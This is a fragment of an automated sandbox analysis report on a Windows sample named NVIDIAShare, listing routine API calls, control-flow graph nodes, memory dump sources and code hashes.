                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01025695,01025695,?,?,?,0102ABAC,00000001,00000001,2DE85006), ref: 0102A9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0102ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0102AA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0102AB35
                                                            • __freea.LIBCMT ref: 0102AB42
                                                              • Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                            • __freea.LIBCMT ref: 0102AB4B
                                                            • __freea.LIBCMT ref: 0102AB70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 7327624c73253e190ce44aaa8aa14dc7a6cceaf8a9f886762efc39c16522b25f
                                                            • Instruction ID: e17c86f3446af1b8c4c6623feef010b685c642ecf620bf1de52a145ebc82628d
                                                            • Opcode Fuzzy Hash: 7327624c73253e190ce44aaa8aa14dc7a6cceaf8a9f886762efc39c16522b25f
                                                            • Instruction Fuzzy Hash: 1B51B472700226EFEB268E68CC51EAFBBEAEB44610B154A69FD84D7542DF34DC50C650

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 975 1023b72-1023b7c 976 1023bee-1023bf1 975->976 977 1023bf3 976->977 978 1023b7e-1023b8c 976->978 979 1023bf5-1023bf9 977->979 980 1023b95-1023bb1 LoadLibraryExW 978->980 981 1023b8e-1023b91 978->981 984 1023bb3-1023bbc GetLastError 980->984 985 1023bfa-1023c00 980->985 982 1023b93 981->982 983 1023c09-1023c0b 981->983 987 1023beb 982->987 983->979 988 1023be6-1023be9 984->988 989 1023bbe-1023bd3 call 1026088 984->989 985->983 986 1023c02-1023c03 FreeLibrary 985->986 986->983 987->976 988->987 989->988 992 1023bd5-1023be4 LoadLibraryExW 989->992 992->985 992->988
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,01023C35,?,?,01062088,00000000,?,01023D60,00000004,InitializeCriticalSectionEx,01036394,InitializeCriticalSectionEx,00000000), ref: 01023C03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818
                                                            • Opcode ID: 599c4b34abc17fc5aceb73388bc4da6cfbe1af06dde01334e37a4d6efd649e0e
                                                            • Instruction ID: 315f4e2644b309b458b7cef3ff9711bcc3eb08a1390a7496eea3b5bbdac81b15
                                                            • Opcode Fuzzy Hash: 599c4b34abc17fc5aceb73388bc4da6cfbe1af06dde01334e37a4d6efd649e0e
                                                            • Instruction Fuzzy Hash: 7211C435A04235ABDB338E6C9C8079D77A8BB09660F110150FAD1EF284D72AE90087D0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 993 101abab-101abca GetClassNameW 994 101abf2-101abf4 993->994 995 101abcc-101abe1 call 1011fbb 993->995 997 101abf6-101abf8 994->997 998 101abff-101ac01 994->998 1000 101abf1 995->1000 1001 101abe3-101abef FindWindowExW 995->1001 997->998 1000->994 1001->1000
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 0101ABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 0101ABF9
                                                              • Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0101ABE9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: @Ut$EDIT
                                                            • API String ID: 4243998846-2065656831
                                                            • Opcode ID: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
                                                            • Instruction ID: fdef43b3eb64f9e5ee46f2791b8f376966dc1bd59d8439ba5046b73dfb4533c0
                                                            • Opcode Fuzzy Hash: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
                                                            • Instruction Fuzzy Hash: 57F0E232701268BAEA3056289C09FDB7AACAB42B00F080451FA84E71C8D769D94586F5

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
                                                              • Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858
                                                            • OleInitialize.OLE32(00000000), ref: 0101AC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
                                                            • SHGetMalloc.SHELL32(01048438), ref: 0101AC70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll$3Qo
                                                            • API String ID: 3498096277-4232643773
                                                            • Opcode ID: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
                                                            • Instruction ID: de0c2c066df0be36b2813305af08cdc1cff539e17a37911c3627e3cde9ae58f5
                                                            • Opcode Fuzzy Hash: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
                                                            • Instruction Fuzzy Hash: 90F012B1D0020AABDB10AFA9D8489DFFFFCFF94700F00415AE895E6205DBB856458FA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1006 10098e0-1009901 call 101ec50 1009 1009903-1009906 1006->1009 1010 100990c 1006->1010 1009->1010 1011 1009908-100990a 1009->1011 1012 100990e-100991f 1010->1012 1011->1012 1013 1009921 1012->1013 1014 1009927-1009931 1012->1014 1013->1014 1015 1009933 1014->1015 1016 1009936-1009943 call 1006edb 1014->1016 1015->1016 1019 1009945 1016->1019 1020 100994b-100996a CreateFileW 1016->1020 1019->1020 1021 10099bb-10099bf 1020->1021 1022 100996c-100998e GetLastError call 100bb03 1020->1022 1024 10099c3-10099c6 1021->1024 1026 10099c8-10099cd 1022->1026 1028 1009990-10099b3 CreateFileW GetLastError 1022->1028 1024->1026 1027 10099d9-10099de 1024->1027 1026->1027 1029 10099cf 1026->1029 1030 10099e0-10099e3 1027->1030 1031 10099ff-1009a10 1027->1031 1028->1024 1032 10099b5-10099b9 1028->1032 1029->1027 1030->1031 1033 10099e5-10099f9 SetFileTime 1030->1033 1034 1009a12-1009a2a call 1010602 1031->1034 1035 1009a2e-1009a39 1031->1035 1032->1024 1033->1031 1034->1035
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,01007760,?,00000005,?,00000011), ref: 0100995F
                                                            • GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,01007760,?,00000005,?), ref: 010099A2
                                                            • GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
                                                            • Instruction ID: 222b96d065fb82373c182a2d9a11c53edd2b75b0e7c213ac18208096a4d53eee
                                                            • Opcode Fuzzy Hash: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
                                                            • Instruction Fuzzy Hash: 0F31F3305447466FF7329B2CCD85BDABBD8BB44324F100B19FAE9961C2D7A9A484CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1065 101b568-101b581 PeekMessageW 1066 101b583-101b597 GetMessageW 1065->1066 1067 101b5bc-101b5be 1065->1067 1068 101b599-101b5a6 IsDialogMessageW 1066->1068 1069 101b5a8-101b5b6 TranslateMessage DispatchMessageW 1066->1069 1068->1067 1068->1069 1069->1067
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
                                                            • IsDialogMessageW.USER32(0001044E,?), ref: 0101B59E
                                                            • TranslateMessage.USER32(?), ref: 0101B5AC
                                                            • DispatchMessageW.USER32(?), ref: 0101B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
                                                            • Instruction ID: 1633354f7ded88808f9f7caf4b745224206bf1a6314bb01919f5ab00f27dd280
                                                            • Opcode Fuzzy Hash: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
                                                            • Instruction Fuzzy Hash: 2AF0BD71A0111ABB9B309BE59D5CEDB7FBCEE052917004415F549D6018EB3DD109CBF0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1070 101dbde-101dc09 call 101ec50 SetEnvironmentVariableW call 1010371 1074 101dc0e-101dc12 1070->1074 1075 101dc14-101dc18 1074->1075 1076 101dc36-101dc38 1074->1076 1077 101dc21-101dc28 call 101048d 1075->1077 1080 101dc1a-101dc20 1077->1080 1081 101dc2a-101dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0101DBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
                                                            • Instruction ID: 9cb1007f255d773dcb693c674015889c190e70ac8f314e663e60cf7efa3ee115
                                                            • Opcode Fuzzy Hash: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
                                                            • Instruction Fuzzy Hash: 6BF0ECB240422AB7DB212FD9CC49AFB3BACBF14781B040855BDC59901DE7BC8480D7B0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1082 1009785-1009791 1083 1009793-100979b GetStdHandle 1082->1083 1084 100979e-10097b5 ReadFile 1082->1084 1083->1084 1085 1009811 1084->1085 1086 10097b7-10097c0 call 10098bc 1084->1086 1087 1009814-1009817 1085->1087 1090 10097c2-10097ca 1086->1090 1091 10097d9-10097dd 1086->1091 1090->1091 1092 10097cc 1090->1092 1093 10097ee-10097f2 1091->1093 1094 10097df-10097e8 GetLastError 1091->1094 1095 10097cd-10097d7 call 1009785 1092->1095 1097 10097f4-10097fc 1093->1097 1098 100980c-100980f 1093->1098 1094->1093 1096 10097ea-10097ec 1094->1096 1095->1087 1096->1087 1097->1098 1100 10097fe-1009807 GetLastError 1097->1100 1098->1087 1100->1098 1102 1009809-100980a 1100->1102 1102->1095
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 01009795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 010097AD
                                                            • GetLastError.KERNEL32 ref: 010097DF
                                                            • GetLastError.KERNEL32 ref: 010097FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
                                                            • Instruction ID: 96ad69860a02c9ad5b6ecdd5c7c81921caf53b7ec2ea1dd63a076b0d0c50013a
                                                            • Opcode Fuzzy Hash: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
                                                            • Instruction Fuzzy Hash: C011C231900204EBFF734E29C84466D77ECFB40328F108669F5DE852C2D7798A44CB61
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0100D710,00000000,00000000,?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue), ref: 0102AD66
                                                            • GetLastError.KERNEL32(?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000,00000364,?,010298B7), ref: 0102AD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000), ref: 0102AD80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
                                                            • Instruction ID: 0751f8038fa6d3f97cf8c9002dd80e6159192b0d3865aa8b6ace89b4c9ebaa40
                                                            • Opcode Fuzzy Hash: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
                                                            • Instruction Fuzzy Hash: BE01D436701236EBC772596C9C84A5B7B9CAF056A37110620F987D7545DB2AD401C7E0
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0100D343,00000001,?,?,?,00000000,0101551D,?,?,?), ref: 01009F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0101551D,?,?,?,?,?,01014FC7,?), ref: 01009FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0100D343,00000001,?,?), ref: 0100A011
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
                                                            • Instruction ID: 493a91900ea6ba7a0376d952b5b7f2b7dbb6d2942c63b486677dcdc525178ea5
                                                            • Opcode Fuzzy Hash: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
                                                            • Instruction Fuzzy Hash: FF31DF71208309EFEB16CE24D858BBEB7A9FB80715F04051CF9C55B2D1C776A948CBA2
                                                            APIs
                                                              • Part of subcall function 0100C27E: _wcslen.LIBCMT ref: 0100C284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A30C
                                                            • GetLastError.KERNEL32(?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
                                                            • Instruction ID: 2753721b89d16633d4da004b44c93eea8ea069dc90c5e05c833055b3f4a33166
                                                            • Opcode Fuzzy Hash: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
                                                            • Instruction Fuzzy Hash: BC019235700324EAFF63AA794849BED7788AF09680F048494FAC1D70C4D698D58187A5
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0102B8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: ba188ca890e86d4939bc96032415b636620f1406a3b2f572a34015cb0f752316
                                                            • Instruction ID: 8f3a7bf5e30a118955fe2a2897e48e7c3e210e6cfc639311d24a4aca95e09aab
                                                            • Opcode Fuzzy Hash: ba188ca890e86d4939bc96032415b636620f1406a3b2f572a34015cb0f752316
                                                            • Instruction Fuzzy Hash: 7C41E6716042AC9EDB228E688C84BFABBF9EB55304F1408EDD5DA87142D275AA45CF60
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0102AFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
